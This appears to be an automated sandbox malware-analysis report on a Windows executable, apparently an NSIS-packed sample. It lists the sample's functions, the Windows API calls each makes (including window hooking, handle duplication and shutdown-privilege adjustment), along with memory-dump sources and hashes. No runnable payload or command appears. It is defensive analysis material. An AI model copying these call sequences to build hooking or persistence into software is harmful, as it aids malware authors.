API String ID: 2102729457-0
Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C

Function 00405088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004050B7
CallWindowProcA.USER32(?,?,?,?), ref: 00405108

Part of subcall function 004040C7: SendMessageA.USER32(00010404,00000000,00000000,00000000), ref: 004040D9

Strings

, xrefs: 00405098

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD

Function 00403775 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76F93410,00000000,C:\Users\user\AppData\Local\Temp\,0040374D,00403567,?,?,00000006,00000008,0000000A), ref: 0040378F
GlobalFree.KERNEL32(00898E90), ref: 00403796

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403775

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-297319885
Opcode ID: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
Instruction ID: 7399a24566e835d4bf74ae8faf6f599a32d3c581d2ea115a227339331e7fa0df
Opcode Fuzzy Hash: d916e2e12d8e8e0e05938552f8e86e2cfc1f8e413d7ca81264c0c58d55c0495e
Instruction Fuzzy Hash: 1BE0C273401120ABC6216F15ED0871A777C6F46B27F02C12BF8407B26087781C434FC8

Function 004059CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\H33UCslPzv.exe,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 004059D2
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E30,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\H33UCslPzv.exe,C:\Users\user\Desktop\H33UCslPzv.exe,80000000,00000003), ref: 004059E0

Strings

C:\Users\user\Desktop, xrefs: 004059CC

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2743851969
Opcode ID: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
Instruction ID: cdf7710bfdc0c04f3d6b4f220b8e9fd9f04d7b2eba678cf51078301a7514d20a
Opcode Fuzzy Hash: 4402843b33e5109e67992b99d0281bb7e81fac819ebae0ac34b6d7d52c4d849b
Instruction Fuzzy Hash: 5AD0C7E2409D705EF30372549D05B9F6A48DF17715F1A0467E181A61A1C67C4D4247BD

Function 700210E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 7002115B
GlobalFree.KERNEL32(00000000), ref: 700211B4
GlobalFree.KERNEL32(?), ref: 700211C7
GlobalFree.KERNEL32(?), ref: 700211F5

Memory Dump Source

Source File: 00000000.00000002.1954804177.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true

Associated: 00000000.00000002.1954777519.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954823374.0000000070023000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1954905655.0000000070025000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_70020000_H33UCslPzv.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 60e6aa623e6564e28d78b47401a37a4add2a367702222da90ebc2d3145c327bf
Instruction ID: 3557778345d52d73402946f3e350ec16555b41a839846964f5877b8059552f1a
Opcode Fuzzy Hash: 60e6aa623e6564e28d78b47401a37a4add2a367702222da90ebc2d3145c327bf
Instruction Fuzzy Hash: 8B31D4B2504140AFE7118F65FD85BAD7FFDEB15A72B340059FA46C2362D7749862CB20

Function 00405AEB Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AFB
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B24
lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B2D

Memory Dump Source

Source File: 00000000.00000002.1913907040.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1913866371.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913929543.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1913954422.00000000007B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1914284254.00000000007B6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_H33UCslPzv.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9

Analysis Process: H33UCslPzv.exePID: 5968, Parent PID: 1528COMMON

Execution Graph

Execution Coverage:	8.2%
Dynamic/Decrypted Code Coverage:	97.6%
Signature Coverage:	0%
Total number of Nodes:	123
Total number of Limit Nodes:	11

Executed Functions

Function 38857950 Relevance: 1.9, APIs: 1, Instructions: 396
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c9c2118a1547581b413fa415c827711b48b3eaff747af0e4059b1d75a4ec509
Instruction ID: 5b136c4aff3534b05f3ab9324d13c0718896b94ad9f09bd716c08d35bb98fd57
Opcode Fuzzy Hash: 4c9c2118a1547581b413fa415c827711b48b3eaff747af0e4059b1d75a4ec509
Instruction Fuzzy Hash: 2FF12674A00309CFEB04EFA9C944B9DBBF1BF88704F15C569E409AB2A5DB70A945CB90

Function 000D711B Relevance: 6.1, APIs: 4, Instructions: 129
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000D719E
GetCurrentThread.KERNEL32 ref: 000D71DB
GetCurrentProcess.KERNEL32 ref: 000D7218
GetCurrentThreadId.KERNEL32 ref: 000D7271

Memory Dump Source

Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0c95617190df5ee2e22856c59db39caa987d29ec8531ba027261e41ac91fdc3d
Instruction ID: 88adfb08ec1466c4c4734214d6308f24f79981f174bf7a3ff27a40ae30eb681d
Opcode Fuzzy Hash: 0c95617190df5ee2e22856c59db39caa987d29ec8531ba027261e41ac91fdc3d
Instruction Fuzzy Hash: 315185B0901349CFDB14CFA9D548BAEBBF1AF48304F20845EE809A73A0DB74A945CF61

Function 000D7120 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 000D719E
GetCurrentThread.KERNEL32 ref: 000D71DB
GetCurrentProcess.KERNEL32 ref: 000D7218
GetCurrentThreadId.KERNEL32 ref: 000D7271

Memory Dump Source

Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 543058f01f6b09b5c948edec7483dff6628c5a5fc3987d9e44ce55b62bde73a9
Instruction ID: 7c46ae19e6d96b810fa398289aef9359abc6532b5ab2a6ad51e3b93784a91783
Opcode Fuzzy Hash: 543058f01f6b09b5c948edec7483dff6628c5a5fc3987d9e44ce55b62bde73a9
Instruction Fuzzy Hash: 515177B0901749CFDB14CFAAD548BAEBBF1AF48304F20845EE809A7350DB746945CF61

Function 38851EB0 Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38852042

Memory Dump Source

Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 2a2f6af6955d767c3f5dcfa486c60ce485a9117278b6137b207b52fc57f3a792
Instruction ID: ee1bdb24e5da54d469b3455367681128b3cf9348e1d6e8b0a209258ecbc67bcb
Opcode Fuzzy Hash: 2a2f6af6955d767c3f5dcfa486c60ce485a9117278b6137b207b52fc57f3a792
Instruction Fuzzy Hash: 686107B5C05389EFDB02CFA5C940ACEBFB1BF4A300F15819AE858AB261D7359845CF51

Function 38851F30 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 38852042

Memory Dump Source

Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 7aec58cd7660abce0c510911d9a9165fe91686318b1e3a1106ca49134f89ba9c
Instruction ID: dce01783db9a2c8613bef05b0de2c2e4569940a01928e47a032aa1469d17ac21
Opcode Fuzzy Hash: 7aec58cd7660abce0c510911d9a9165fe91686318b1e3a1106ca49134f89ba9c
Instruction Fuzzy Hash: 1441B1B5D10349DFDB14CFA9C884ADEFBB5BF48310F64812AE819AB210DB75A845CF90

Function 388531F4 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 38854E41

Memory Dump Source

Source File: 00000005.00000002.2751728484.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_38850000_H33UCslPzv.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 90d9e18c6fbd60dab6470a459afddcfe5617b5e871e67e8a65bdf3a228e55169
Instruction ID: 2cffb5e6a1268f2a85c33e03301a360a6a09d35e711aca3922bbaf2706becaab
Opcode Fuzzy Hash: 90d9e18c6fbd60dab6470a459afddcfe5617b5e871e67e8a65bdf3a228e55169
Instruction Fuzzy Hash: 3F410AB9900309DFDB14CF9AC484B9ABBF5FF89310F24C859D519AB321D774AA41CBA1

Function 000D7360 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 000D73EF

Memory Dump Source

Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fb3288663b5976641f0439c6696e11408bea34753bae4d81ecb14c4686fd9186
Instruction ID: bbc5888b0a5b715d04bb6e9dcf43981052f8577ba052f8383941432791d2da91
Opcode Fuzzy Hash: fb3288663b5976641f0439c6696e11408bea34753bae4d81ecb14c4686fd9186
Instruction Fuzzy Hash: D221D2B5900249DFDB10CFAAD584AEEBBF4EB48310F14845AE958A3750D378A9548FA1

Function 000D7368 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 000D73EF

Memory Dump Source

Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eb23fde2a61cfef5e165e23e3b78dd262f0088d95f4c9549e8cb74906db91f42
Instruction ID: 3fad35908a274458472b9a39712604e8d1ecd40ea98649098bdc47908721004f
Opcode Fuzzy Hash: eb23fde2a61cfef5e165e23e3b78dd262f0088d95f4c9549e8cb74906db91f42
Instruction Fuzzy Hash: B621C4B5900349DFDB10CFAAD584ADEFBF4EB48310F14841AE958A7350D378A954CFA5

Function 000D2260 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 000D22E3

Memory Dump Source

Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 46cf42f9f701688de435174da86dc048dce86af0fa1cb81175b0274f26d22402
Instruction ID: 7445e297d88c7d1a2b7baaa96f2a845953e32c74cca5e45a8635d6247b302c95
Opcode Fuzzy Hash: 46cf42f9f701688de435174da86dc048dce86af0fa1cb81175b0274f26d22402
Instruction Fuzzy Hash: 252104759002099FDB54CFAAC844BEEFBF5AF88320F14842AE459A7250C778A944CFA1

Function 000D2268 Relevance: 1.6, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 000D22E3

Memory Dump Source

Source File: 00000005.00000002.2722001012.00000000000D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d0000_H33UCslPzv.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: fccea0983f663d014642fbd13621f6779e81c7ed39401e433b914894f371c155
Instruction ID: cd853ae1c88f70e6e8c727ebebfd01c190cfb099c5a90d64c725b43adc3530c8
Opcode Fuzzy Hash: fccea0983f663d014642fbd13621f6779e81c7ed39401e433b914894f371c155
Instruction Fuzzy Hash: 4521E5759002099FDB14CFAAD944BEEFBF5AF88310F14842AE459A7350C775A944CFA1

Function 0009D500 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 477dfbbc5faf3a862d3b6b81e8acedf871ae271cd33fc29fcdc0ba48f5879df3
Instruction ID: 1c682eccc1e13f88bea32fbb881b36541b333488fabb8f3e5939f922d53de8a9
Opcode Fuzzy Hash: 477dfbbc5faf3a862d3b6b81e8acedf871ae271cd33fc29fcdc0ba48f5879df3
Instruction Fuzzy Hash: 40212571544644DFDF15DF10D9C0B2ABFA5FB98318F24C16AE9090B246C336D856EBA2

Function 0009D414 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb85154ee1e73b9a7c3ccd103bb6deec59e8694dbb5ae7cd538ccccc28ddca31
Instruction ID: 772f00df2196d04bf5ef71494ae94d3454a56733aef671cf46f5bb65dd3e4918
Opcode Fuzzy Hash: eb85154ee1e73b9a7c3ccd103bb6deec59e8694dbb5ae7cd538ccccc28ddca31
Instruction Fuzzy Hash: 89213771544340EFDF14DF10D9C0F2ABBA5FB94324F24C16AE9090B256C336E856EBA2

Function 000AD0FC Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2721904604.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ad000_H33UCslPzv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a189437e4b4dbfad5d00d6b77d91565c15a55fb8250d1b41cabb442aa54c67b8
Instruction ID: eb57543b193dadf89541a587a0e3c811cc36c74859aab93ab083ae17e415839e
Opcode Fuzzy Hash: a189437e4b4dbfad5d00d6b77d91565c15a55fb8250d1b41cabb442aa54c67b8
Instruction Fuzzy Hash: DD2126B1604344FFDB14DF90D9C0B2ABBA5FB89314F24C56ED90A4B692C736D846CB62

Function 0009D40F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
Instruction ID: ce1e217f1a8710762b0eafd16ad6b635711e00165f08018c25193c3800d3738c
Opcode Fuzzy Hash: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
Instruction Fuzzy Hash: 4C112676504280DFCF11CF10D5C4B56BFB2FB94324F28C1AAD8490B656C33AE856DBA2

Function 0009D4FB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2721843960.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_9d000_H33UCslPzv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
Instruction ID: 6aa8e48fc0824ab184da9cbb11d9aad87b6e994f386729e1e887ab8f84c2f94a
Opcode Fuzzy Hash: 9f9437f30326f346a6e4ef68c86d5a25821768f1485dd91fb54989fd0a98561e
Instruction Fuzzy Hash: B711E172504640CFCF11CF10D5C0B16BFA2FB84314F28C2AAD8090B656C33AD856DBA2

Function 000AD0F7 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2721904604.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_ad000_H33UCslPzv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca8490141c5683cf716b0a9b8ed7578e2fbd6c5bc2cd125330644b42239aa3c7
Instruction ID: de1bdd91e81a69d180bffc81809348a452a0ac48835baea2cc056ea5f1ed9bc0
Opcode Fuzzy Hash: ca8490141c5683cf716b0a9b8ed7578e2fbd6c5bc2cd125330644b42239aa3c7
Instruction Fuzzy Hash: D711DD75504280EFDB05CF50D9C4B15BFB1FB85318F28C6AAD84A4BA56C33AD84ACB62

Non-executed Functions

Function 00403289 Relevance: 73.8, APIs: 30, Strings: 12, Instructions: 288stringfilecomCOMMON

Download Yara Rule

APIs

Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
OleInitialize.OLE32(00000000), ref: 004032E9
SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
GetCommandLineA.KERNEL32(007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
CharNextA.USER32(00000000,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 00403356
GetTempPathA.KERNEL32(00000400,007AA400,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
GetWindowsDirectoryA.KERNEL32(007AA400,000003FB,?,?,00000160), ref: 00403464
lstrcatA.KERNEL32(007AA400,\Temp,?,?,00000160), ref: 00403470
GetTempPathA.KERNEL32(000003FC,007AA400,007AA400,\Temp,?,?,00000160), ref: 00403484
lstrcatA.KERNEL32(007AA400,Low,?,?,00000160), ref: 0040348C
SetEnvironmentVariableA.KERNEL32(TEMP,007AA400,007AA400,Low,?,?,00000160), ref: 0040349D
SetEnvironmentVariableA.KERNEL32(TMP,007AA400,?,?,00000160), ref: 004034A5
DeleteFileA.KERNEL32(007AA000,?,00000006,00000008,0000000A), ref: 004034B9
OleUninitialize.OLE32(?,?,?,00000160), ref: 00403567
ExitProcess.KERNEL32 ref: 00403588
lstrcatA.KERNEL32(007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 0040359B
lstrcatA.KERNEL32(007AA400,0040A14C,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035AA
lstrcatA.KERNEL32(007AA400,.tmp,007AA400,~nsu,007A9000,?,?,?,?,00000160), ref: 004035B5
lstrcmpiA.KERNEL32(007AA400,007A9C00), ref: 004035C1
SetCurrentDirectoryA.KERNEL32(007AA400,007AA400,?,?,?,?,00000160), ref: 004035DD
DeleteFileA.KERNEL32(0079E108,0079E108,?,007A4000,?,?,?,?,?,00000160), ref: 00403636
CopyFileA.KERNEL32(007AAC00,0079E108,00000001), ref: 0040364A
CloseHandle.KERNEL32(00000000,0079E108,0079E108,?,0079E108,?,?,?,?,?,00000160), ref: 00403677
GetCurrentProcess.KERNEL32(00000028,?,?,00000160), ref: 004036A5
OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
LookupPrivilegeValueA.ADVAPI32(?,SeShutdownPrivilege,?), ref: 004036C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,?,?,?,?,?,SeShutdownPrivilege,?), ref: 004036E3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
ExitProcess.KERNEL32 ref: 0040372A

Part of subcall function 004059B0: CharNextA.USER32(?,00403355,007A9000,00000020,007A9000,00000000,?,00000006,00000008,0000000A), ref: 004059BD

Strings

Low, xrefs: 00403486
